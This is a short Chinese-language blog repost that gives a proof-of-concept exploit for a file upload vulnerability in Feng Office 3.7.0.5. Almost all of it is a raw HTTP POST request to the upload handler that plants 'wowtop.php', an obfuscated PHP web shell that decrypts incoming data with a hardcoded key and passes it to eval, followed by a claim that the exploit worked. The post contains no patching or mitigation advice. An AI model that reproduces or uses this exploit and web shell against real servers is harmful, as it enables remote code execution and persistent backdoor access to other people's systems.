Feng Office 3.7.0.5文件上传漏洞

渗透技巧 1个月前 admin
129 0 0

特征:小绿标

Feng Office 3.7.0.5文件上传漏洞

特征界面二:

Feng Office 3.7.0.5文件上传漏洞

POC:

POST /ck_upload_handler.php HTTP/1.1Host: <IP>Content-Length: 791Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: <IP>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE7DSCkF65FIKmwixUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: <IP>Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryE7DSCkF65FIKmwixContent-Disposition: form-data; name="upload"; filename="wowtop.php"Content-Type: application/octet-stream
<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params);?>
------WebKitFormBoundaryE7DSCkF65FIKmwix--

验证成功:

Feng Office 3.7.0.5文件上传漏洞



- End -

原文始发于微信公众号(NS Demon团队):Feng Office 3.7.0.5文件上传漏洞

版权声明:admin 发表于 2022年12月26日 上午10:01。
转载请注明:Feng Office 3.7.0.5文件上传漏洞 | CTF导航

相关文章

暂无评论

暂无评论...